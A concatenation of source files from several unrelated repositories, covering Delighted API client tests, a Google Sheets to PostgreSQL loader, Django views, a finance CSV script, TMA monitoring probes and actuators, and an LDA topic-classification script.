self.mock_response(200, {}, resp)
survey_response = delighted.SurveyResponse.retrieve('456',
expand=['person'])
self.check_call('get', url, get_headers, None, {'expand[]': 'person'})
self.assertTrue(delighted.SurveyResponse is type(survey_response))
self.assertTrue(delighted.Person is type(survey_response.person))
self.assertEqual(resp, survey_response)
self.assertEqual(
{'id': '123', 'email': '<EMAIL>', 'type': 'aaa'},
survey_response.person
)
self.assertEqual('123', survey_response.person.id)
self.assertEqual('<EMAIL>', survey_response.person.email)
self.assertEqual('aaa', survey_response.person.type)
self.assertEqual(10, survey_response.score)
self.assertEqual('456', survey_response.id)
def test_updating_a_survey_response(self):
url = 'https://api.delightedapp.com/v1/survey_responses/456'
data = {'person': '123', 'score': 10}
resp = {'id': '456', 'person': '123', 'score': 10}
self.mock_response(200, {}, resp)
old = {'id': '456', 'person': '321', 'score': 1}
survey_response = delighted.SurveyResponse(old)
survey_response.person = '123'
survey_response.score = 10
self.assertTrue(delighted.SurveyResponse is type(survey_response.save()))
self.check_call('put', url, post_headers, resp, None)
self.assertEqual(resp, survey_response)
self.assertEqual('123', survey_response.person)
self.assertEqual(10, survey_response.score)
self.assertEqual('456', survey_response.id)
def test_listing_all_survey_responses(self):
url = 'https://api.delightedapp.com/v1/survey_responses'
resp1 = {'id': '123', 'comment': 'One'}
resp2 = {'id': '456', 'comment': 'Two'}
self.mock_response(200, {}, [resp1, resp2])
survey_responses = delighted.SurveyResponse.all(order='desc')
self.check_call('get', url, get_headers, None, {'order': 'desc'})
self.assertTrue(list is type(survey_responses))
self.assertTrue(delighted.SurveyResponse is type(survey_responses[0]))
self.assertEqual({'id': '123', 'comment': 'One'}, survey_responses[0])
self.assertEqual('One', survey_responses[0].comment)
self.assertEqual('123', survey_responses[0].id)
self.assertTrue(delighted.SurveyResponse is type(survey_responses[1]))
self.assertEqual({'id': '456', 'comment': 'Two'}, survey_responses[1])
self.assertEqual('Two', survey_responses[1].comment)
self.assertEqual('456', survey_responses[1].id)
def test_listing_all_survey_responses_expand_person(self):
url = 'https://api.delightedapp.com/v1/survey_responses'
resp1 = {'id': '123', 'comment': 'One',
'person': {'id': '456', 'email': '<EMAIL>', 'type': 'aaa'}}
resp2 = {'id': '789', 'comment': 'Two',
'person': {'id': '012', 'email': '<EMAIL>', 'type': 'bbb'}}
self.mock_response(200, {}, [resp1, resp2])
survey_responses = delighted.SurveyResponse.all(expand=['person'])
self.check_call('get', url, get_headers, None, {'expand[]': 'person'})
self.assertTrue(list is type(survey_responses))
self.assertTrue(delighted.SurveyResponse is type(survey_responses[0]))
self.assertEqual(resp1, survey_responses[0])
self.assertEqual('One', survey_responses[0].comment)
self.assertEqual('123', survey_responses[0].id)
self.assertEqual(delighted.Person, type(survey_responses[0].person))
self.assertEqual(
{'id': '456', 'email': '<EMAIL>', 'type': 'aaa'},
survey_responses[0].person
)
self.assertEqual('456', survey_responses[0].person.id)
self.assertEqual('<EMAIL>', survey_responses[0].person.email)
self.assertEqual('aaa', survey_responses[0].person.type)
self.assertTrue(delighted.SurveyResponse is type(survey_responses[1]))
self.assertEqual(resp2, survey_responses[1])
self.assertEqual('Two', survey_responses[1].comment)
self.assertEqual('789', survey_responses[1].id)
self.assertEqual(delighted.Person, type(survey_responses[1].person))
self.assertEqual(
{'id': '012', 'email': '<EMAIL>', 'type': 'bbb'},
survey_responses[1].person
)
self.assertEqual('012', survey_responses[1].person.id)
self.assertEqual('<EMAIL>', survey_responses[1].person.email)
self.assertEqual('bbb', survey_responses[1].person.type)
def test_listing_all_people(self):
url = 'https://api.delightedapp.com/v1/people'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
person2 = {'id': '456', 'email': '<EMAIL>', 'name': '<NAME>'}
self.mock_response(200, {}, [person1, person2])
people = delighted.Person.all()
self.check_call('get', url, get_headers, {}, None)
self.assertTrue(list is type(people))
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual({'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}, people[0])
self.assertEqual('<EMAIL>', people[0].email)
self.assertEqual('<NAME>', people[0].name)
self.assertEqual('123', people[0].id)
self.assertTrue(delighted.Person is type(people[1]))
self.assertEqual({'id': '456', 'email': '<EMAIL>', 'name': '<NAME>'}, people[1])
self.assertEqual('<NAME>', people[1].name)
self.assertEqual('<EMAIL>', people[1].email)
self.assertEqual('456', people[1].id)
def test_listing_all_people_pagination(self):
url = 'https://api.delightedapp.com/v1/people'
url_next = 'http://api.delightedapp.com/v1/people?nextlink123'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
person2 = {'id': '456', 'email': '<EMAIL>', 'name': '<NAME>'}
person3 = {'id': '789', 'email': '<EMAIL>', 'name': '<NAME>'}
mock_response = delighted.http_response.HTTPResponse(200, {}, [person1, person2], {'next': {'url': url_next}})
mock_response_next = delighted.http_response.HTTPResponse(200, {}, [person3], {})
self.mock_multiple_responses([mock_response, mock_response_next])
people = []
for person in delighted.Person.list().auto_paging_iter():
people.append(person)
call_1 = {'meth': 'get', 'url': url, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_2 = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
self.check_multiple_call([call_1, call_2])
self.assertEqual(len(people), 3)
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual(person1, people[0])
self.assertTrue(delighted.Person is type(people[1]))
self.assertEqual(person2, people[1])
self.assertTrue(delighted.Person is type(people[2]))
self.assertEqual(person3, people[2])
def test_listing_all_people_pagination_rate_limited(self):
url = 'https://api.delightedapp.com/v1/people'
url_next = 'http://api.delightedapp.com/v1/people?nextlink123'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
mock_response = delighted.http_response.HTTPResponse(200, {}, [person1], {'next': {'url': url_next}})
mock_response_rate_limited = delighted.http_response.HTTPResponse(429, {'Retry-After': '10'}, [], {})
self.mock_multiple_responses([mock_response, mock_response_rate_limited])
people = []
with self.assertRaises(TooManyRequestsError) as context:
for person in delighted.Person.list().auto_paging_iter(auto_handle_rate_limits=False):
people.append(person)
self.assertEqual(context.exception.response.headers['Retry-After'], '10')
call_1 = {'meth': 'get', 'url': url, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_2 = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
self.check_multiple_call([call_1, call_2])
self.assertEqual(len(people), 1)
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual(person1, people[0])
def test_listing_all_people_pagination_auto_handle_rate_limit(self):
url = 'https://api.delightedapp.com/v1/people'
url_next = 'http://api.delightedapp.com/v1/people?nextlink123'
person1 = {'id': '123', 'email': '<EMAIL>', 'name': '<NAME>'}
person_next = {'id': '456', 'email': '<EMAIL>', 'name': 'Next Person'}
mock_response = delighted.http_response.HTTPResponse(200, {}, [person1], {'next': {'url': url_next}})
mock_response_rate_limited = delighted.http_response.HTTPResponse(429, {'Retry-After': '3'}, [], {})
mock_response_accepted = delighted.http_response.HTTPResponse(200, {}, [person_next], {})
self.mock_multiple_responses([mock_response, mock_response_rate_limited, mock_response_accepted])
people = []
with patch('time.sleep', return_value=None) as patched_time_sleep:
for person in delighted.Person.list().auto_paging_iter(auto_handle_rate_limits=True):
people.append(person)
patched_time_sleep.assert_called_once_with(3)
call_1 = {'meth': 'get', 'url': url, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_rejected = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
call_accepted = {'meth': 'get', 'url': url_next, 'kwargs': {'headers': get_headers, 'data': {}, 'params': None}}
self.check_multiple_call([call_1, call_rejected, call_accepted])
self.assertEqual(len(people), 2)
self.assertTrue(delighted.Person is type(people[0]))
self.assertEqual(person1, people[0])
self.assertTrue(delighted.Person is type(people[1]))
self.assertEqual(person_next, people[1])
def test_listing_all_unsubscribes(self):
url = 'https://api.delightedapp.com/v1/unsubscribes'
resp1 = {'person_id': '123', 'email': '<EMAIL>', 'name': 'Foo', 'unsubscribed_at': 1440621400}
self.mock_response(200, {}, [resp1])
unsubscribes = delighted.Unsubscribe.all()
self.check_call('get', url, get_headers, {}, None)
self.assertTrue(list is type(unsubscribes))
self.assertTrue(delighted.Unsubscribe is type(unsubscribes[0]))
self.assertEqual(resp1, dict(unsubscribes[0]))
def test_listing_all_bounces(self):
url = 'https://api.delightedapp.com/v1/bounces'
resp1 = {'person_id': '123', 'email': '<EMAIL>', 'name': 'Foo', 'bounced_at': 1440621400}
self.mock_response(200, {}, [resp1])
bounces = delighted.Bounce.all()
self.check_call('get', url, get_headers, {}, None)
self.assertTrue(list is type(bounces))
self.assertTrue(delighted.Bounce is type(bounces[0]))
self.assertEqual(resp1, dict(bounces[0]))
def test_rate_limit_response(self, client=None):
self.mock_response(429, {'Retry-After': '5'}, {})
# https://docs.python.org/2/library/unittest.html#unittest.TestCase.assertRaises
# Ability to use assertRaises() as a context manager was added in 2.7
if sys.version_info < (2, 7):
self.assertRaises(delighted.errors.TooManyRequestsError, lambda: delighted.Metrics.retrieve(client=client))
else:
with self.assertRaises(delighted.errors.TooManyRequestsError) as context:
delighted.Metrics.retrieve(client=client)
self.assertEqual(5, context.exception.retry_after)
@classmethod
def _naive_date_to_epoch_seconds(cls, date_obj, timezone):
datetime_obj = timezone.localize(naive_date_to_datetime(date_obj))
return aware_datetime_to_epoch_seconds(datetime_obj)
```
|
{
"source": "jesska-f/g2pg",
"score": 3
}
|
#### File: g2pg/g2pg/g2pg.py
```python
import gspread_dataframe as gd
import gspread
import pandas as pd
from sqlalchemy import create_engine
from oauth2client.service_account import ServiceAccountCredentials
import json
from pangres import upsert
import os
import sys
from string import punctuation
def create_keyfile_dict():
"""
Creates a keyfile dictionary based on environment variables to be used in the oauth with google.\n
Follow these directions to get the json credentials file <https://gspread.readthedocs.io/en/latest/oauth2.html#for-bots-using-service-account>\n
Copy and paste the credentials in your .env file with the following format:
SHEET_TYPE= 'service_account'
SHEET_PROJECT_ID= 'api-project-XXX'
SHEET_PRIVATE_KEY_ID= '<KEY>'
SHEET_PRIVATE_KEY="-----BEGIN PRIVATE KEY-----\nNrDyLw … jINQh/9\n-----END PRIVATE KEY-----\n"
SHEET_CLIENT_EMAIL= '<EMAIL>'
SHEET_CLIENT_ID= '1234567890'
SHEET_AUTH_URI= 'https://accounts.google.com/o/oauth2/auth'
SHEET_TOKEN_URI= 'https://oauth2.googleapis.com/token'
SHEET_AUTH_PROVIDER_X509_CERT_URL= 'https://www.googleapis.com/oauth2/v1/certs'
SHEET_CLIENT_X509_CERT_URL= 'https://www.googleapis.com/robot/v1/metadata/bla...bla..bla.iam.gserviceaccount.com'
"""
variables_keys = {
"type": os.environ.get("SHEET_TYPE"),
"project_id": os.environ.get("SHEET_PROJECT_ID"),
"private_key_id": os.environ.get("SHEET_PRIVATE_KEY_ID"),
#this is so that python reads the newlines as newlines and not text
"private_key": os.environ.get("SHEET_PRIVATE_KEY").replace('\\n',"\n"),
"client_email": os.environ.get("SHEET_CLIENT_EMAIL"),
"client_id": os.environ.get("SHEET_CLIENT_ID"),
"auth_uri": os.environ.get("SHEET_AUTH_URI"),
"token_uri": os.environ.get("SHEET_TOKEN_URI"),
"auth_provider_x509_cert_url": os.environ.get("SHEET_AUTH_PROVIDER_X509_CERT_URL"),
"client_x509_cert_url": os.environ.get("SHEET_CLIENT_X509_CERT_URL")
}
if variables_keys['type'] == None:
print('Issue with environment variables, please check that they have been set')
sys.exit(1)
return variables_keys
def get_df_from_gsheet(gsheet_name,worksheet_name='Sheet1',skiprows=0):
"""
Gets data from a google sheet worksheet and puts it in a DataFrame.\n
Authorises with google oauth based on the data specified in your environment variables (see `create_keyfile_dict()`).\n
Make sure the Gsheet has been shared with your `client_email` from your json credential file from google.\n
Opens the gsheet specified in gsheet_name and uses `Sheet1` if no worksheet_name is specified and puts the data in a dataframe.\n
Selects all the non null columns and rows, and renames the columns to be db friendly.
Parameters
----------
gsheet_name : str
Exact Name of Gsheet to extract data from.
worksheet_name : str, optional
Name of the worksheet to get the data from. (default is `Sheet1`)
skiprows : int
Rows to skip in the sheet before extracting the data
Returns
-------
A DataFrame containing the data in the google sheet.
"""
try:
k = create_keyfile_dict()
#authorise with google
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
credentials = ServiceAccountCredentials.from_json_keyfile_dict(create_keyfile_dict(), scope)
gc = gspread.authorize(credentials)
except Exception as e:
print(e)
print('Auth with google unsuccessful, please check your credentials')
sys.exit(1)
try:
#Open the gsheet and put the data into a df
sheet = gc.open(gsheet_name).worksheet(worksheet_name)
sheet_df = gd.get_as_dataframe(sheet,evaluate_formulas=True,skiprows=skiprows)
except Exception as e:
print(e)
print('''Data extract from google sheet was unsuccessful.\nPlease check the name of the sheet and the worksheet, and that the client email specified in your env file has access to the sheet''')
sys.exit(1)
#find rows and columns with all nulls, to remove them from the df
try:
nans_rows = sheet_df[sheet_df.isnull().all(axis=1)].index[0]-1
nans_columns = sheet_df.columns.drop(sheet_df.columns[sheet_df.isnull().all()])
sheet_df = sheet_df.loc[:nans_rows,nans_columns]
except:
pass
#change column names to be db friendly
sheet_df.columns = [("".join([i for i in c if i not in punctuation.replace('_','')])).lower().strip().replace(' ','_') for c in sheet_df.columns]
return sheet_df
def df_to_db(df, table_name,schema=None, index_name='index'):
"""
Writes a DataFrame to a the specified table in the PostgreSQL database.\n
If the table exisits, it will update the rows and insert new rows, otherwise it will create the table.\n
This uses environment variables to access the DB. Make sure your .env file contains the following (replace with the relevant data):\n
DB_USER= 'username'
DB_PW = '<PASSWORD>'
DB_URL = 'db_address'
DB_NAME = 'my_exciting_db_name'
Parameters
----------
df : DataFrame
The DataFrame to write to the db. Make sure your columns of of the dtype you want in the db.
table_name : str
The `table_name` to update or create the table with in the DB.
schema : str, optional
The schema where the table should be located. (default in None, which refers to the `public` schema)
index_name : str, optional
The index name (must be the index of your df). Default is `index`.
"""
#'postgresql://username:password@db_address/db'
try:
engine = create_engine('postgresql://'+os.environ.get('DB_USER') +':'+os.environ.get('DB_PW')+'@'+os.environ.get('DB_URL')+'/'+ os.environ.get('DB_NAME'))
except Exception as e:
print(e)
print('Could not establish connection to db. Please check credentials in .env file')
sys.exit(1)
try:
df.index.name = index_name
upsert(engine=engine,
df=df,
table_name=table_name,
if_row_exists='update',
schema=schema,
dtype=None)
except Exception as e:
print(e)
print('Could not write data to the specified table, check that the db credentials in .env file are correct and have write permissions')
sys.exit(1)
```
|
{
"source": "Jesskas/YAYDL",
"score": 2
}
|
#### File: yaydlsite/search_and_convert/views.py
```python
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, Http404
from django.template import loader
# Youtube Search API stuff
# Called on GET /
def index(request):
return render(request, 'search_and_convert/search.html')
# Called on "Search" button click
def search(request):
# if (request.GET.get('searchBtn')):
# print('user click!')
# return HttpResponse("y halo thar")
# return 'hey'
# searchBtn = "hey"
return HttpResponse("Search")
#
# def select(request):
# return HttpResponse("Select")
#
# def convert(request):
# return HttpResponse("Convert")
# from django.shortcuts import render, get_object_or_404
# from django.http import HttpResponse, Http404
# from django.template import loader
#
# from .models import Question
#
# def index(request):
# latest_question_list = Question.objects.order_by('-pub_date')[:5]
# #template = loader.get_template('polls/index.html')
# context = { 'latest_question_list': latest_question_list, }
# #return HttpResponse(template.render(context, request))
# return render(request, 'polls/index.html', context)
#
# def detail(request, question_id):
# #try:
# # question = Question.objects.get(pk=question_id)
# #except Question.DoesNotExist:
# # raise Http404("Question does not exist")
# question = get_object_or_404(Question, pk=question_id)
# return render(request, 'polls/detail.html', {'question': question})
# #return HttpResponse("You're looking at question %s." % question_id)
#
# def results(request, question_id):
# return HttpResponse("You're looking at the results of question %s." % question_id)
#
# def vote(request, question_id):
# return HttpResponse("You're voting on question %s." % question_id)
```
|
{
"source": "jess-lammert/tut_finance_code",
"score": 3
}
|
#### File: jess-lammert/tut_finance_code/fin_script_v1.py
```python
##note. search "##" for user notes throughout
#%%SETUP
##set paths for each account folder containing csvs
cheq_dir = r"PATH"
sav_dir = r"PATH"
cred_dir = r"PATH"
##list desired column names, MUST have 'date' and 'amount' columns
cheq_cols = ["date","transaction","name", "memo", "amount"]
sav_cols = ["date","transaction","name", "memo", "amount"]
cred_cols = ["date","activity","merchant_name","merchant_type","amount"]
dirs = [cheq_dir, sav_dir, cred_dir]
#other iterables?
cols = [cheq_cols, sav_cols, cred_cols]
#%%IMPORT
import os
import glob
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.dates import date2num
import numpy as np
#%%FUNCTIONS
#read csvs as df
def read_files(account_dir, col_names):
#get list of file names
account_files = glob.glob(account_dir + "/*.csv")
account_dfs = []
for file in account_files: #for each file in folder
#read each csv as df, columns specified by col_names
account_df = pd.read_csv(file, header=0, names=col_names)
print(account_df)
account_dfs.append(account_df)
return account_dfs #list of dfs
#clean each df
def clean_dfs(account_dfs):
#set column types
for df in account_dfs:
#set date column to datetime, any format to yyyy-mm-dd
df["date"] = df["date"].apply(pd.to_datetime)
if type(df["amount"][0]) is str: #check if amount has special chars = str
df["amount"] = df["amount"].str.replace("$","")#remove $ in amount ##OTHER CHARS?
df["amount"] = pd.to_numeric(df["amount"])
#set type for any other columns?
print(df)
#combine all dfs for each account
account_df = pd.concat(account_dfs)
print(account_df)
return account_df #single concatenated df
#calculate running balance
def running_balance(account_df):
#filter for date and amount columns
bal_df = account_df[["date","amount"]]
#aggregate data by day
bal_df = bal_df.groupby("date", as_index = False).agg("sum")
#get account balances
end_balance = bal_df["amount"].sum() ##works from beginning of time, otherwise must be known?
start_balance = end_balance - bal_df["amount"].sum()
#record running balance
bal_df["balance"] = start_balance + bal_df["amount"].cumsum()
print(bal_df)
return bal_df
#plot balances ##needs aesthetics -- plots should be moved out of functions in future versions
def plot_balance(bal_df):
plt.plot(bal_df["date"], bal_df["balance"])
plt.title("*Account* balance by date") ##make variable?
plt.xlabel("Date")
plt.ylabel("Balance ($)")
fig = plt.figure(figsize = (8,6))
plt.show()
return fig
#%%START
#read files and clean dataframes
cheq_dfs = read_files(cheq_dir, cheq_cols)
sav_dfs = read_files(sav_dir, sav_cols)
cred_dfs = read_files(cred_dir, cred_cols)
#clean/combine dataframes
cheq_df = clean_dfs(cheq_dfs)
sav_df = clean_dfs(sav_dfs)
cred_df = clean_dfs(cred_dfs)
#record balances
cheq_bal = running_balance(cheq_df)
sav_bal = running_balance(sav_df)
#plot savings balance
sav_plot = plot_balance(sav_bal)
```
|
{
"source": "jessmaciel/tma-framework-e",
"score": 2
}
|
#### File: actuators/demo-actuator-python/demo-actuator.py
```python
from flask import Flask
from flask import request
import json
import os
import logging
import logging.config
from tmalibrary.actuator import *
demoActuator = Flask(__name__)
logger = logging.getLogger(__name__)
logger.info('Starting Demo Actuator')
@demoActuator.route('/ActuatorAPI/act', methods=['POST'])
def process_message():
# load json file
input = request.get_data()
message = HandleRequest()
payload = message.processRequest(input)
operation = executeaction(payload.action)
return message.generateResponse(str(operation))
# Execute the action
def executeaction(action):
logger.info('Action: %s', action)
switcher = {
"scale": "action " + action,
"sendMail": "action " + action,
"demoPython": "action" + action
}
return switcher.get(action, "Not defined action: " + action)
# load logging configuration file
def setup_logging(default_path='logging.json', env_key='LOG_CFG'):
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=logging.DEBUG)
if __name__ == '__main__':
setup_logging()
logger = logging.getLogger(__name__)
logger.info('Initializing Demo Actuator')
demoActuator.run(debug='True', host='0.0.0.0', port=8080)
```
|
{
"source": "jessmaciel/tma-framework-m",
"score": 2
}
|
#### File: probes/probe-k8s-docker/probe-k8s-docker.py
```python
import docker
import ast
import sys
import json
import time
from datetime import datetime
import requests
from tmalibrary.probes import *
# get stats from container
def get_container_stats(container_name, url, communication):
# connect to docker
cli = docker.from_env()
# get container
container = cli.containers.get(container_name)
# get stream of stats from container
stats_obj = container.stats()
for stat in stats_obj:
# print the response
send_stat(eval(stat), url, communication)
# send stat to API server
def send_stat(stat, url, communication):
# format the stats from container
stat_formatted = format(stat)
# url = 'http://0.0.0.0:5000/monitor'
response = communication.send_message(stat_formatted)
# format stat to
def format(stat):
st = [-1] * 96
# sometimes the following metrics can be empty (reboot can fix it). -1 -> empty
if len(stat['blkio_stats']['io_service_bytes_recursive']) > 0:
for i in range(0,15,3):
st[i] = stat['blkio_stats']['io_service_bytes_recursive'][i/3]['major']
st[i+1] = stat['blkio_stats']['io_service_bytes_recursive'][i/3]['minor']
st[i+2] = stat['blkio_stats']['io_service_bytes_recursive'][i/3]['value']
if len(stat['blkio_stats']['io_serviced_recursive']) > 0:
for i in range (15,30,3):
st[i] = stat['blkio_stats']['io_serviced_recursive'][i/3-5]['major']
st[i+1] = stat['blkio_stats']['io_serviced_recursive'][i/3-5]['minor']
st[i+2] = stat['blkio_stats']['io_serviced_recursive'][i/3-5]['value']
if len(stat['blkio_stats']['io_queue_recursive']) > 0:
for i in range(30,45,3):
st[i] = stat['blkio_stats']['io_queue_recursive'][i/3-10]['major']
st[i+1] = stat['blkio_stats']['io_queue_recursive'][i/3-10]['minor']
st[i+2] = stat['blkio_stats']['io_queue_recursive'][i/3-10]['value']
if len(stat['blkio_stats']['io_service_time_recursive']) > 0:
for i in range(45,60,3):
st[i] = stat['blkio_stats']['io_service_time_recursive'][i/3-15]['major']
st[i+1] = stat['blkio_stats']['io_service_time_recursive'][i/3-15]['minor']
st[i+2] = stat['blkio_stats']['io_service_time_recursive'][i/3-15]['value']
if len(stat['blkio_stats']['io_wait_time_recursive']) > 0:
for i in range(60,75,3):
st[i] = stat['blkio_stats']['io_wait_time_recursive'][i/3-20]['major']
st[i+1] = stat['blkio_stats']['io_wait_time_recursive'][i/3-20]['minor']
st[i+2] = stat['blkio_stats']['io_wait_time_recursive'][i/3-20]['value']
if len(stat['blkio_stats']['io_merged_recursive']) > 0:
for i in range(75,90,3):
st[i] = stat['blkio_stats']['io_merged_recursive'][i/3-25]['major']
st[i+1] = stat['blkio_stats']['io_merged_recursive'][i/3-25]['minor']
st[i+2] = stat['blkio_stats']['io_merged_recursive'][i/3-25]['value']
if len(stat['blkio_stats']['io_time_recursive']) > 0:
st[90] = stat['blkio_stats']['io_time_recursive'][0]['major']
st[91] = stat['blkio_stats']['io_time_recursive'][0]['minor']
st[92] = stat['blkio_stats']['io_time_recursive'][0]['value']
if len(stat['blkio_stats']['sectors_recursive']) > 0:
st[93] = stat['blkio_stats']['sectors_recursive'][0]['major']
st[94] = stat['blkio_stats']['sectors_recursive'][0]['minor']
st[95] = stat['blkio_stats']['sectors_recursive'][0]['value']
other_st = [
stat['num_procs'],
stat['cpu_stats']['cpu_usage']['total_usage'],
stat['cpu_stats']['cpu_usage']['percpu_usage'][0],
stat['cpu_stats']['cpu_usage']['usage_in_kernelmode'],
stat['cpu_stats']['cpu_usage']['usage_in_usermode'],
stat['cpu_stats']['system_cpu_usage'],
stat['cpu_stats']['online_cpus'],
stat['cpu_stats']['throttling_data']['periods'],
stat['cpu_stats']['throttling_data']['throttled_periods'],
stat['cpu_stats']['throttling_data']['throttled_time'],
stat['memory_stats']['usage'],
stat['memory_stats']['max_usage'],
stat['memory_stats']['stats']['active_anon'],
stat['memory_stats']['stats']['active_file'],
stat['memory_stats']['stats']['cache'],
stat['memory_stats']['stats']['dirty'],
stat['memory_stats']['stats']['hierarchical_memory_limit'],
stat['memory_stats']['stats']['inactive_anon'],
stat['memory_stats']['stats']['inactive_file'],
stat['memory_stats']['stats']['mapped_file'],
stat['memory_stats']['stats']['pgfault'],
stat['memory_stats']['stats']['pgmajfault'],
stat['memory_stats']['stats']['pgpgin'],
stat['memory_stats']['stats']['pgpgout'],
stat['memory_stats']['stats']['rss'],
stat['memory_stats']['stats']['rss_huge'],
stat['memory_stats']['stats']['total_active_anon'],
stat['memory_stats']['stats']['total_active_file'],
stat['memory_stats']['stats']['total_cache'],
stat['memory_stats']['stats']['total_dirty'],
stat['memory_stats']['stats']['total_inactive_anon'],
stat['memory_stats']['stats']['total_inactive_file'],
stat['memory_stats']['stats']['total_mapped_file'],
stat['memory_stats']['stats']['total_pgfault'],
stat['memory_stats']['stats']['total_pgmajfault'],
stat['memory_stats']['stats']['total_pgpgin'],
stat['memory_stats']['stats']['total_pgpgout'],
stat['memory_stats']['stats']['total_rss'],
stat['memory_stats']['stats']['total_rss_huge'],
stat['memory_stats']['stats']['total_unevictable'],
stat['memory_stats']['stats']['total_writeback'],
stat['memory_stats']['stats']['unevictable'],
stat['memory_stats']['stats']['writeback'],
stat['memory_stats']['limit'],
]
merge_st = st + other_st
# the timestamp is the same for all metrics from this stat variable (Python is not compatible with nanoseconds,
# so [:-4] -> microseconds)
timestamp = int(time.mktime(datetime.strptime(stat['read'][:-4], '%Y-%m-%dT%H:%M:%S.%f').timetuple()))
# message to sent to the server API
# follow the json schema
# sentTime = current time? Or the same timestamp from the metrics?
# need to change the probeId, resourceId and messageId
message = Message(probeId=1, resourceId=1, messageId=0, sentTime=int(time.time()), data=None)
# append measurement data to message
for i in range(len(merge_st)):
dt = Data(type="measurement", descriptionId=(i+1), observations=None)
obs = Observation(time=timestamp, value=merge_st[i])
dt.add_observation(observation=obs)
# append data to message
message.add_data(data=dt)
# return message formatted in json
return json.dumps(message.reprJSON(), cls=ComplexEncoder)
if __name__ == '__main__':
# receive the container name and server url as parameters
container_name = str(sys.argv[1] + '')
url = str(sys.argv[2] + '')
communication = Communication(url)
get_container_stats(container_name, url, communication)
```
#### File: probes/probe-python-demo/probe-python-demo.py
```python
import ast
import sys
import json
import time
from datetime import datetime
import requests
from tmalibrary.probes import *
def send_message(url, message_formated):
# url = 'http://0.0.0.0:5000/monitor'
headers = {'content-type': 'application/json'}
# return the response from Post request
return requests.post(url, data=message_format, headers=headers)
def create_message():
# the timestamp is the same for all metrics from this stat variable (Python is not compatible with nanoseconds,
# so [:-4] -> microseconds)
# message to sent to the server API
# follow the json schema
# sentTime = current time? Or the same timestamp from the metrics?
# need to change the probeId, resourceId and messageId
message = Message(probeId=1, resourceId=101098, messageId=0, sentTime=int(time.time()), data=None)
timestamp = int(time.time())
# append measurement data to message
dt = Data(type="measurement", descriptionId=1, observations=None)
obs = Observation(time=timestamp, value=20000.00001 + 1)
dt.add_observation(observation=obs)
# append data to message
message.add_data(data=dt)
# append event data to message
dt = Data(type="event", descriptionId=2, observations=None)
obs = Observation(time=timestamp, value=-1)
dt.add_observation(observation=obs)
# append data to message
message.add_data(data=dt)
# return message formatted in json
return json.dumps(message.reprJSON(), cls=ComplexEncoder)
if __name__ == '__main__':
# receive the container name and server url as parameters
url = str(sys.argv[1] + '')
communication = Communication(url)
while 1:
message_formated = create_message()
response=communication.send_message(message_formated)
#response=send_message(url, message_formated)
time.sleep(1)
print (response.text)
```
|
{
"source": "jessmed/TFG",
"score": 2
}
|
#### File: DocViewer/mi_aplicacion/views.py
```python
from django.shortcuts import render, HttpResponse,redirect
from django.views import generic
import os
import json
WORK_DIR = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '../..'))
# Vista para el índice del viewer
def index(request):
dir = WORK_DIR
return render(request,'index.html')
# Vista para la lista de documentos
def doclist(request):
path = WORK_DIR + "\\final_database\\text"
# Eliminamos la extensió para mostrarlo como lista
docs = [os.path.splitext(filename)[0] for filename in os.listdir(path)]
# Dividimos la lista en 3 partes para mostrarla facilmente ya que son muchos archivos
n = len(docs)//3
docs_list = [docs[i:i + n] for i in range(0, len(docs), n)]
return render(request, 'doclist.html', {'docs_1': docs_list[0],
'docs_2': docs_list[1],
'docs_3': docs_list[2]})
# Vista para mostrar las estadisticas que se obtienen del algoritmo LDA
def statistics(request):
s = "stat.html"
return render(request,'statistics.html',{'s': s})
# Vista para mostrar los documentos, leemos el JSON asociado al que se clica
# extraemos los campos del JSON para devolverlos
def document(request):
# Obtenemos el nombre del paper que se ha usado
paper_id = request.GET.get("doc")
mode = request.GET.get("mode")
path = WORK_DIR + "\\final_database\\"+mode+"\\"+paper_id+".json"
path_colors = WORK_DIR + "\\final_database\\topic_color.json"
json_data = open(path)
json_colors = open(path_colors)
obj = json.load(json_data) # deserialises it
obj_colors = json.load(json_colors)
title = obj["title"]
abstract = obj["abstract"]
json_data.close()
return render(request, 'document_base.html', {'paper_id': paper_id,
'title':title,
'abstract':abstract,
'mode':mode,
'obj_colors':obj_colors})
#-------------------------------------------------------------------------
```
#### File: TFG/src/topic_clasification.py
```python
import time
import numpy as np #version 1.20.3
import json
import os
#Gensim
import gensim
import gensim.corpora as corpora
from gensim.utils import simple_preprocess
#spacy
import spacy
from nltk.corpus import stopwords
#vis
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from os import listdir
# Load a potentially pretrained model from disk.
from gensim.test.utils import datapath
# --------------------------------------------------------------
WORK_DIR = os.path.dirname(os.path.abspath(__file__)) # Directorio actual de trabajo # Aplicar filtro de palabras comunes
NUM_TOPICS=15 # Número de documentos que usamos
# Cargamos json tipic-colores
color_list = json.load(open(WORK_DIR + "\\final_database\\topic_color.json"))
nlp = spacy.load("en_core_web_sm", disable=["parser", "ner"])
"""
Para cada documento de la base de datos realizaremos los siguientes pasos:
1. Cargamos el modelo preentrenado LDA
2. Para cada documento de la base de datos lo convertimos en un BoW
para poder usar los métodos del modelo
3. Calculamos la probabilidad para cada documento o frase de cada documento
4. Lo añadimos a los archivos para que puedan leerse correctamente por el servidor
"""
stopwords = stopwords.words("english")
